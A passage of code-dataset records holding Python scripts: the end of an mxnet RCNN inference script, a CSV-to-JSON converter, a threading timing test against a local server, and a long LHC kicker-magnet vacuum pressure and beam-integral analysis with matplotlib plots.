result_dic[img.strip()] = tmp\n    json.dump(result_dic, open(args.save_json, 'w'),indent=2)\n    print('result json file saved to: {}'.format(args.save_json))\n\ndef test(args):\n    global CLASSES, DATA_SHAPES, SHORT_SIDE, LONG_SIDE\n    # args = parse_args()\n    ctx = mx.gpu(args.gpu)\n    CLASSES = ['__background__']\n    SHORT_SIDE, LONG_SIDE = args.shortside, args.longside\n    DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]\n    with open(args.labellist, 'r') as label_list:\n        for label in label_list:\n            CLASSES.append(label.strip())\n    # print(CLASSES)\n    symbol = eval('rcnn.symbol.get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)\n    # symbol = rcnn.symbol.get_resnet_test(\n    #     num_classes=len(CLASSES), num_anchors=config.NUM_ANCHORS)\n    predictor = get_net(symbol, args.prefix, args.epoch, ctx)\n    demo_net(predictor, args.image, args.vis, save_dir=args.savedir, save_name='objdet_'+os.path.basename(args.image), threshold=args.threshold)\n\nif __name__ == '__main__':\n    args = parse_args()\n    if args.test:\n        print('testing single image...')\n        test(args)\n    else:\n        print('start testing...')\n        main(args)\n","sub_path":"mxnet-cubicle/obj-det/rcnn/infer_dummy.py","file_name":"infer_dummy.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"536330804","text":"# Read the CSV file\nimport csv\nimport json\n\ndata = {}\nfilename = 'ch02-data.csv'\nwith open(filename) as f:\n    reader = csv.reader(f)\n    for row in reader:\n        data[row[0]] = row[1]\n\n# Write the data out as JSON\nfilename2 = 'fileFor05.json'\nwith open(filename2, 'w') as f_obj:\n    json.dump(data, f_obj)\n\n","sub_path":"chapter02_data/05_ExportToJson.py","file_name":"05_ExportToJson.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"133544892","text":"import threading\nfrom datetime import datetime\n\nimport requests\n\n\ndef sample_func():\n    response = requests.get('http://192.168.10.6:8000/zzz/sleep/5')\n    print(response.text)\n\n\nCOUNT = 5\n\nstart = datetime.now()\nfor _ in range(COUNT):\n    sample_func()\nfinish = datetime.now()\nprint('Single : {}'.format(finish - start))\ndel start, finish\n\nthread_list = []\nstart = datetime.now()\nfor i in range(COUNT):\n    thread_list.append(threading.Thread(name = 'Thread {}'.format(i + 1), target = sample_func))\n\nfor th in thread_list:\n    print(th.name)\n    th.start()\n\nfor th in thread_list:\n    th.join()\nfinish = datetime.now()\nprint('Multi-Thread : {}'.format(finish - start))\n","sub_path":"sample/thread/test_thread_2.py","file_name":"test_thread_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"271040226","text":"import matplotlib.pyplot as plt\nimport pytimber\nfrom pytimber import pagestore\nimport calendar, time\nimport math\n#%matplotlib notebook\n#####COMBINING SCRIPTS FOR MKI2 AND MKI8#####\n\n\n# DEFINING FUNCTIONS\n\n# sort by the second element (the array length), descending\ndef sort(x):\n    return sorted(x, key=lambda time: time[1], reverse=True)\n\n\n# choosing the second magnet (in array length) for alignment\ndef get_magnet(x):\n    return x[1]\n\n\n# calculating elapsed time\nelapb1 = []\n\nelapb2 = []\n\ndef elapsed(ts, ts0):\n    return (ts - ts0) / 3600\n\n
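# elapsed() converts a timestamp difference in seconds into hours, e.g. elapsed(7200, 0) == 2.0\n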
[]\nbeam_chargeb1=0\nbeam_intb2 = []\nbeam_chargeb2=0\n\ndef beam_elapsedb1(tsOne, tsZero, bi, counti):\n global beam_elap_running_totalb1\n #print(counti)\n if bi >= 10 ** 12 and counti>0:\n beam_elap_running_totalb1=beam_elap_running_totalb1+(tsOne - tsZero) / 3600\n #print(beam_elap_running_total, tsOne, tsZero, counti)\n return beam_elap_running_totalb1\n \n else: \n return beam_elap_running_totalb1+10 ** (-12)\n \ndef beam_elapsedb2(tsOne, tsZero, bi, counti):\n global beam_elap_running_totalb2\n #print(counti)\n if bi >= 10 ** 12 and counti>0:\n beam_elap_running_totalb2=beam_elap_running_totalb2+(tsOne - tsZero) / 3600\n #print(beam_elap_running_total, tsOne, tsZero, counti)\n return beam_elap_running_totalb2\n \n else: \n return beam_elap_running_totalb2+10 ** (-12) \n\ndef beam_integralb1(tsOne, TsZero, Ione, Izero, counti):\n global beam_chargeb1\n if Ione >= 10 ** 12 and counti>0:\n if math.isnan(Izero): \n Izero=0\n beam_chargeb1 = beam_chargeb1+((tsOne-TsZero)*(Ione+Izero)*1.602176*10**(-19))/2\n #print(tsOne, (tsOne-TsZero),'Izero=',Izero,Ione,(Ione+Izero)*1.602176*10**(-19), beam_chargeb1, counti)\n return beam_chargeb1\n \n else:\n return beam_chargeb1\n \ndef beam_integralb2(tsOne, TsZero, Ione, Izero, counti):\n global beam_chargeb2\n if Ione >= 10 ** 12 and counti>0:\n if math.isnan(Izero): \n Izero=0\n beam_chargeb2 = beam_chargeb2+((tsOne-TsZero)*(Ione+Izero)*1.602176*10**(-19))/2\n #print((tsOne-TsZero),(Ione+Izero)*1.602176*10**(-19), beam_chargeb2, counti)\n return beam_chargeb2\n \n else:\n return beam_chargeb2\n# calculating normalized pressure MKI2\nnormAb1 = []\nnormBb1 = []\nnormCb1 = []\nnormDb1 = []\nnormDCb1 = []\nnormAQ4b1 = []\nnormQ5Db1 = []\nnormBAb1 = []\nnormCBb1 = []\n\n# calculating normalized pressure MKI8\nnormAb2 = []\nnormBb2 = []\nnormCb2 = []\nnormDb2 = []\nnormDCb2 = []\nnormAQ4b2 = []\nnormQ5Db2 = []\nnormBAb2 = []\nnormCBb2 = []\n\n\n\ndef normalization(p, bi):\n if bi >= 10 ** 12:\n return p / bi\n else:\n return 10 ** -99\n\n# RUNNING THE COD\nxupperlim = 100 #Charge Coloumbs\n# xupperlim = 1550 for the whole of 2017 Run\n#defining the time window\n#MKI2 time\n# 29/4/2017: LHC circulating protons for 1st time in 2017 https://home.cern/news/news/accelerators/lhc-has-restarted-its-2017-run\n# 30/3/2018: LHC circulating protons for 1st time in 2018 https://home.cern/news/news/accelerators/beams-are-back-lhc\n\nt1b1 = \"2012-07-01 00:00:00\"\nt2b1 = \"2012-07-01 23:59:59\"\nt1b2 = \"2012-07-01 00:00:00\"\nt2b2 = \"2012-07-01 23:59:59\"\n\n# t1b1 = \"2015-06-01 00:00:00\" # was 2017-04-29\n# t2b1 = \"2015-07-30 23:59:59\"\n\n# t1b2 = \"2015-06-01 00:00:00\" # was 2018-03-30\n# t2b2 = \"2015-07-30 23:59:59\" # was 2018-10-01\nPlotVsTime = \"N\" # Y or N\nPlotBothMagD_Interconnects = \"N\"\nPlotBothInterconnects = \"N\"\n\n#===============================================================================\n# #===============================================================================\n# t1b1 = \"2018-04-20 00:00:00\"\n# t2b1 = \"2018-05-29 23:59:59\"\n# # \n# t1b2 = \"2018-04-20 00:00:00\"\n# t2b2 = \"2018-05-29 23:59:59\"\n# #===============================================================================\n#===============================================================================\n\nt0_beam2_elap_running_total_start_counter = \"2012-07-01 00:00:00\"\n#t0_beam2_elap_running_total_start_counter = \"2018-04-16 00:00:00\"\n#t1b2 = \"2018-04-20 00:00:00\"\n#t1b2 = \"2018-05-11 00:00:00\"\n#t2b2 = \"2018-05-29 23:59:59\"\n\n# subtract 0s to keep 
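beam_integralb1/beam_integralb2 above accumulate beam charge with the trapezoid rule one sample pair at a time, through module-level running totals. The same running integral can be computed in a single vectorized pass; a hedged NumPy sketch (the 1.602176e-19 C elementary-charge constant and the 1e12-proton beam-on threshold are taken from the functions above):

import numpy as np

E_CHARGE = 1.602176e-19  # coulombs per proton, as in beam_integralb1/b2

def beam_charge(timestamps, intensities, threshold=1e12):
    t = np.asarray(timestamps, dtype=float)
    i = np.nan_to_num(np.asarray(intensities, dtype=float))  # NaN -> 0, like the isnan guard
    # trapezoid rule: each interval contributes dt * (I0 + I1) / 2 * e
    areas = 0.5 * np.diff(t) * (i[:-1] + i[1:]) * E_CHARGE
    areas[i[1:] < threshold] = 0.0  # intervals ending below threshold count as no beam
    return np.cumsum(areas)  # running total, analogous to beam_intb1/beam_intb2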
in UTC time.\n# subtract 2 * 3600s to convert from Local time to UTC time\nt1sb1= calendar.timegm(time.strptime(t1b1,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nt2sb1= calendar.timegm(time.strptime(t2b1,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nbeam1_elap_running_total=0\nt0_beam1_elap_running_total_start_counter = \"2012-07-01 00:00:00\"\n\nt0b1=beam1_elap_running_total\n\ntitletextb1=\"Start time (MKI2) = \",t1b1,\" End time (MKI2) = \",t2b1,\" Start beam1 elapsed time counter = \",int(t0b1*10)/10,\"hrs, since:\",t0_beam1_elap_running_total_start_counter\nprint(titletextb1)\n\n#MKI8 time\n\nt1sb2 = calendar.timegm(time.strptime(t1b2,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nt2sb2 = calendar.timegm(time.strptime(t2b2,\"%Y-%m-%d %H:%M:%S\")) - 0 * 3600\nbeam2_elap_running_total=0\n\n\nt0b2=beam2_elap_running_total\n\ntitletextb2=\"Start time (MKI8) = \",t1b2,\" End time (MKI8) = \",t2b2,\" Start beam1 elapsed time counter = \",int(t0b2*10)/10,\"hrs, since:\",t0_beam2_elap_running_total_start_counter\nprint(titletextb2)\n\n# now = time.time()\n\n# opening the connection to the database\nstart_time = time.time()\n#pageStore = pagestore.PageStore('lhcPressure.db', '/eos/project/l/lhc-injection-kickers/public/vacuum_data/LHC_PRESSURE/02')\npageStore = pagestore.PageStore('lhcPressure.db', './data/LHCpressure_data/')\n\nparameters0b1=[\"MKI.A5L2.B1:PRESSURE\", \"MKI.B5L2.B1:PRESSURE\", \"MKI.C5L2.B1:PRESSURE\", \"MKI.D5L2.B1:PRESSURE\"]\nparameters0b2= [\"MKI.A5R8.B2:PRESSURE\", \"MKI.B5R8.B2:PRESSURE\", \"MKI.C5R8.B2:PRESSURE\", \"MKI.D5R8.B2:PRESSURE\"]\n\n# extracting aligned data MKI2\nparametersb1 = parameters0b1 + [\"VGPB.137.5L2.B.PR\", \"VGPB.14.5L2.B.PR\", \"VGPB.176.5L2.B.PR\", \"VGPB.59.5L2.B.PR\",\n \"VGPB.98.5L2.B.PR\", \"LHC.BCTFR.A6R4.B1:BEAM_INTENSITY\", \"MKI.A5L2.B1:PRESSURE_INT\", \n \"MKI.B5L2.B1:PRESSURE_INT\", \"MKI.C5L2.B1:PRESSURE_INT\", \"MKI.D5L2.B1:PRESSURE_INT\"]\n# extracting aligned data MKI8\nparametersb2 = parameters0b2 + [\"VGPB.138.5R8.R.PR\", \"VGPB.14.5R8.R.PR\", \"VGPB.176.5R8.R.PR\", \"VGPB.59.5R8.R.PR\",\n \"VGPB.98.5R8.R.PR\", \"LHC.BCTFR.A6R4.B2:BEAM_INTENSITY\", \"MKI.A5R8.B2:PRESSURE_INT\", \n \"MKI.B5R8.B2:PRESSURE_INT\", \"MKI.C5R8.B2:PRESSURE_INT\", \"MKI.D5R8.B2:PRESSURE_INT\"]\n#parameters = parameters0 + (\"VGPB.138.5R8.R.PR\", \"VGPB.176.5R8.R.PR\", \n# \"LHC.BCTFR.A6R4.B2:BEAM_INTENSITY\")\n\ndatab1 = pageStore.get(parametersb1, t1sb1, t2sb1)\ndatab2 = pageStore.get(parametersb2, t1sb2 ,t2sb2 )\n\n\n\n# the dictionary returned contains one list of timestamps and one entry per variable with a list of values.\n# all parameters are aligned with the first one\n\n# separating time data from pressure/intensity data MKI2\naligned_timeb1 = datab1['MKI.A5L2.B1:PRESSURE'][0]\npressureAb1 = datab1['MKI.A5L2.B1:PRESSURE'][1]\npressureBb1 = datab1['MKI.B5L2.B1:PRESSURE'][1]\npressureCb1 = datab1['MKI.C5L2.B1:PRESSURE'][1]\n#pressureCb1 = datab1['VGPB.118.5L2.C.PR'][1] \n# Note: MKI.C5L2.B1:PRESSURE valid from 20/6/2018 @ 13:40hrs\n# Note: VGPB.118.5L2.C.PR is much lower time resolution than MKI.C5L2.B1:PRESSURE\npressureDb1 = datab1['MKI.D5L2.B1:PRESSURE'][1]\npressureDCb1 = datab1['VGPB.137.5L2.B.PR'][1]\npressureAQ4b1 = datab1['VGPB.14.5L2.B.PR'][1]\npressureQ5Db1 = datab1['VGPB.176.5L2.B.PR'][1]\npressureBAb1 = datab1['VGPB.59.5L2.B.PR'][1]\npressureCBb1 = datab1['VGPB.98.5L2.B.PR'][1]\nintensityb1 = datab1['LHC.BCTFR.A6R4.B1:BEAM_INTENSITY'][1]\npressureA_intb1 = datab1['MKI.A5L2.B1:PRESSURE_INT'][1]\npressureB_intb1 = datab1['MKI.B5L2.B1:PRESSURE_INT'][1]\npressureC_intb1 
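calendar.timegm(time.strptime(...)) is used above because, unlike time.mktime, timegm interprets the parsed struct_time as UTC rather than local time, so the epoch seconds come out timezone-independent. A small helper makes the intent explicit:

import calendar
import time

def utc_to_epoch(stamp, fmt='%Y-%m-%d %H:%M:%S'):
    # timegm treats the tuple as UTC; time.mktime would shift it by the local offset
    return calendar.timegm(time.strptime(stamp, fmt))

print(utc_to_epoch('2012-07-01 00:00:00'))  # 1341100800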
= datab1['MKI.C5L2.B1:PRESSURE_INT'][1]\npressureD_intb1 = datab1['MKI.D5L2.B1:PRESSURE_INT'][1]\n\n# separating time data from pressure/intensity data MKI8\naligned_timeb2 = datab2['MKI.A5R8.B2:PRESSURE'][0]\npressureAb2 = datab2['MKI.A5R8.B2:PRESSURE'][1]\npressureBb2 = datab2['MKI.B5R8.B2:PRESSURE'][1]\npressureCb2 = datab2['MKI.C5R8.B2:PRESSURE'][1]\npressureDb2 = datab2['MKI.D5R8.B2:PRESSURE'][1]\npressureDCb2 = datab2['VGPB.138.5R8.R.PR'][1]\npressureAQ4b2 = datab2['VGPB.14.5R8.R.PR'][1]\npressureQ5Db2 = datab2['VGPB.176.5R8.R.PR'][1]\npressureBAb2 = datab2['VGPB.59.5R8.R.PR'][1]\npressureCBb2 = datab2['VGPB.98.5R8.R.PR'][1]\nintensityb2 = datab2['LHC.BCTFR.A6R4.B2:BEAM_INTENSITY'][1]\npressureA_intb2 = datab2['MKI.A5R8.B2:PRESSURE_INT'][1]\npressureB_intb2 = datab2['MKI.B5R8.B2:PRESSURE_INT'][1]\npressureC_intb2 = datab2['MKI.C5R8.B2:PRESSURE_INT'][1]\npressureD_intb2 = datab2['MKI.D5R8.B2:PRESSURE_INT'][1]\n\nprint(\"*** Number of entries for aligned_time (MKI2) = \", len(aligned_timeb1))\nprint(\"*** Number of entries for aligned_time (MKI8) = \", len(aligned_timeb2))\n\n\n\n\n\n\n# calculating elapsed time, normalized pressure and beam elapsed time and pressure/normalized pressure\nstart_time = time.time()\n#MKI2\nfor i in range(len(aligned_timeb1)):\n elapb1.append(elapsed(aligned_timeb1[i], aligned_timeb1[0]))\n beam_elapb1.append(beam_elapsedb1(aligned_timeb1[i], aligned_timeb1[i-1], intensityb1[i], i)) \n normAb1.append(normalization(pressureAb1[i], intensityb1[i]))\n normBb1.append(normalization(pressureBb1[i], intensityb1[i]))\n #normCb1.append(normalization(pressureCb1[i], intensityb1[i]))\n normDb1.append(normalization(pressureDb1[i], intensityb1[i]))\n normDCb1.append(normalization(pressureDCb1[i], intensityb1[i]))\n normAQ4b1.append(normalization(pressureAQ4b1[i], intensityb1[i]))\n normQ5Db1.append(normalization(pressureQ5Db1[i], intensityb1[i]))\n normBAb1.append(normalization(pressureBAb1[i], intensityb1[i]))\n normCBb1.append(normalization(pressureCBb1[i], intensityb1[i]))\n ## problem on following line??\n beam_intb1.append(beam_integralb1(aligned_timeb1[i], aligned_timeb1[i-1], intensityb1[i], intensityb1[i-1],i))\ncalculation_time = time.time()-start_time\nprint(\"Execution time for B1: calculating normalized data, elapsed time and integral: %0.3f seconds.\" % calculation_time)\nstart_time = time.time()\n#MKI8\nfor i in range(len(aligned_timeb2)):\n elapb2.append(elapsed(aligned_timeb2[i], aligned_timeb2[0]))\n beam_elapb2.append(beam_elapsedb2(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], i)) \n normAb2.append(normalization(pressureAb2[i], intensityb2[i]))\n normBb2.append(normalization(pressureBb2[i], intensityb2[i]))\n normCb2.append(normalization(pressureCb2[i], intensityb2[i]))\n normDb2.append(normalization(pressureDb2[i], intensityb2[i]))\n normDCb2.append(normalization(pressureDCb2[i], intensityb2[i]))\n normAQ4b2.append(normalization(pressureAQ4b2[i], intensityb2[i]))\n normQ5Db2.append(normalization(pressureQ5Db2[i], intensityb2[i]))\n normBAb2.append(normalization(pressureBAb2[i], intensityb2[i]))\n normCBb2.append(normalization(pressureCBb2[i], intensityb2[i]))\n beam_intb2.append(beam_integralb2(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], intensityb2[i-1],i))\n #print(aligned_timeb2[i], aligned_timeb2[i-1], intensityb2[i], intensityb2[i-1],i)\ncalculation_time = time.time()-start_time\nprint(\"Execution time for B2: calculating normalized data and elapsed time: %0.3f seconds.\" % calculation_time)\n\ntitletextb1=' MKI2: Start 
time = ' + str(t1b1) + ', End time = ' + str(t2b1) + ', Start/End beam1 elapsed time = ' + str(int(t0b1*10)/10) + '/' + str(int(10*beam_elap_running_totalb1)/10) + 'hrs (' + str(int(beam_chargeb1*10)/10) + 'C), since ' + t0_beam1_elap_running_total_start_counter\nprint(titletextb1)\nprint('MKI8: Start time = ' + str(t1b2) + ', End time = ' + str(t2b2) + ', Start/End beam2 elapsed time = ' + str(int(t0b2*10)/10))\n##print(str(int(10*beam_elap_running_totalb2)/10) + 'hrs (')\n##print(beam_chargeb2)\n##print(str(int(beam_chargeb2*10)/10) + 'C), since ')\n##print(t0_beam2_elap_running_total_start_counter)\ntitletextb2='MKI8: Start time = ' + str(t1b2) + ', End time = ' + str(t2b2) + ', Start/End beam2 elapsed time = ' + str(int(t0b2*10)/10) + '/' + str(int(10*beam_elap_running_totalb2)/10) + 'hrs (' + str(int(beam_chargeb2*10)/10) + 'C), since ' + t0_beam2_elap_running_total_start_counter\nprint(titletextb2)\n\n\n\nprint(\"Plot: Beam1 Integral & Beam Intensity vs. Aligned Time\")\nfig, ax1 = plt.subplots(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n#ax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\nax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.set_ylabel(r'Beam Integral (C)')\nax1.set_ylim(0, )\n#ax1.plt.xticks(fontsize=12.5)#ax1.plt.yticks(fontsize=13)\nax1.xaxis.label.set_size(13.5)\nax1.yaxis.label.set_size(13.5)\n#ax1.set_ylim(10 ** -25, 2*10 ** -20)\nax1.set_xlabel(r'Date & (UTC) time')\npytimber.set_xaxis_date(bins=7)\nplt.legend(loc=2, prop={'size':11.5})\nax2 = ax1.twinx()\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n#ax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.plot(aligned_timeb1, normQ5Db1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.set_ylabel(r'Normalized pressure (mbar/p)')\n#ax2.yaxis.label.set_size(13.5)\nax2.tick_params(axis='y', colors='green')\nax2.yaxis.label.set_color('green')\nax2.semilogy()\nax2.set_ylim(10 ** -25, 1*10 ** -21)\n#ax2.set_ylim(0, 3.5*10 ** 14)\nplt.legend(prop={'size':11.5})\nplt.show()\n\nprint(\"Plot: Beam2 Integral & Beam Intensity vs. 
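The plot block above, and the ones that follow, repeat the same twin-axis boilerplate: ax1 for the beam integral, ax2 = ax1.twinx() for intensity or normalized pressure, with the right-hand axis styled green. A hedged helper capturing that pattern, as a sketch rather than a drop-in replacement for the blocks below:

import matplotlib.pyplot as plt

def dual_axis_plot(x, y_left, y_right, left_label, right_label, title=''):
    fig, ax1 = plt.subplots(figsize=(18, 6))
    ax1.plot(x, y_left, '-', color='blue', linewidth=1)
    ax1.set_ylabel(left_label)
    ax1.set_xlabel('Date & (UTC) time')
    ax2 = ax1.twinx()  # second y-axis sharing the same x-axis
    ax2.plot(x, y_right, 'o-', color='green', markersize=1)
    ax2.set_ylabel(right_label)
    ax2.yaxis.label.set_color('green')
    ax2.tick_params(axis='y', colors='green')
    fig.suptitle(title, fontsize=11)
    return fig, (ax1, ax2)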
Aligned Time\")\nfig, ax1 = plt.subplots(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n#ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\nax1.set_ylabel(r'Beam Integral (C)')\nax1.set_ylim(0, )\n#ax1.plt.xticks(fontsize=12.5)#ax1.plt.yticks(fontsize=13)\nax1.xaxis.label.set_size(13.5)\nax1.yaxis.label.set_size(13.5)\n#ax1.set_ylim(10 ** -25, 2*10 ** -20)\nax1.set_xlabel(r'Date & (UTC) time')\npytimber.set_xaxis_date(bins=7)\nplt.legend(loc=2, prop={'size':11.5})\nax2 = ax1.twinx()\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n#ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\nax2.set_ylabel(r'Beam intensity (p)')\n#ax2.yaxis.label.set_size(13.5)\nax2.tick_params(axis='y', colors='green')\nax2.yaxis.label.set_color('green')\nax2.set_ylim(0, 3.5*10 ** 14)\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"N\":\n print(\"Plot: Beam Integral & Beam Intensity vs. Elapsed Beam Time\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n ax1.plot(beam_elapb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n ax1.plot(beam_elapb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n ax1.set_ylabel(r'Beam Integral (C)')\n ax1.set_ylim(0, )\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Beam Elapsed Time (>10**12 p)')\n #pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n ax2 = ax1.twinx()\n ax2.plot(beam_elapb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n ax2.plot(beam_elapb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B2')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\nif PlotVsTime == \"Y\":\n print(\"Plot: Beam Integral & Beam Intensity vs. 
Aligned Time\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n ax1.plot(aligned_timeb1, beam_intb1, 'o-', color='blue', linewidth=1, markersize=0, label='Beam 1 Integral')\n ax1.plot(aligned_timeb2, beam_intb2, 'o-', color='red', linewidth=1, markersize=0, label='Beam 2 Integral')\n ax1.set_ylabel(r'Beam Integral (C)')\n ax1.set_ylim(0, )\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=1, label='Beam intensity B1')\n ax2.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=1, label='Beam intensity B1')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\nprint(\"Plot: Magnet Norm Pressure vs. Beam Integral\")\nplt.figure(figsize=(18,6))\nplt.suptitle(titletextb1, fontsize=11,y=0.98)\nplt.title(titletextb2, fontsize=11, y=1.03)\n#plt.suptitle(titletextb2, fontsize=11, y=0.94)\nplt.plot(beam_intb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\nplt.plot(beam_intb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(10 ** -25, 1*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"Y\":\n # Beam intensity\n print(\"Plot: Beam Intensity vs. 
Time\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n #plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(aligned_timeb1, intensityb1, 'o-', color='blue', markersize=2, label='Beam intensity B1')\n plt.plot(aligned_timeb2, intensityb2, 'o-', color='red', markersize=2, label='Beam intensity B2')\n #plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n #ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Beam intensity (p)')\n #ax.semilogy()\n ax.set_ylim(0, 3.5*10 ** 14)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotBothMagD_Interconnects == \"Y\":\n print(\"Plot: MKI2D+Interconnects & MKI8D+Interconnects\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n plt.plot(beam_intb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n plt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n plt.plot(beam_intb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n plt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n plt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n ax.xaxis.label.set_size(13.5)\n ax.yaxis.label.set_size(13.5)\n ax.set_xlim(0, xupperlim)\n ax.set_ylabel(r'Normalized pressure (mbar/p)')\n ax.semilogy()\n ax.set_ylim(10 ** -25, 1*10 ** -20)\n ax.set_xlabel(r'Beam Integral (C)')\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotBothInterconnects == \"Y\":\n print(\"Plot 4\")\n plt.figure(figsize=(18,6))\n plt.suptitle(titletextb1, fontsize=11,y=0.98)\n plt.title(titletextb2, fontsize=11, y=1.03)\n #plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n plt.plot(beam_intb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\n plt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n #plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n plt.plot(beam_intb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\n plt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\n ax=plt.gca()\n plt.xticks(fontsize=12.5)\n plt.yticks(fontsize=13)\n 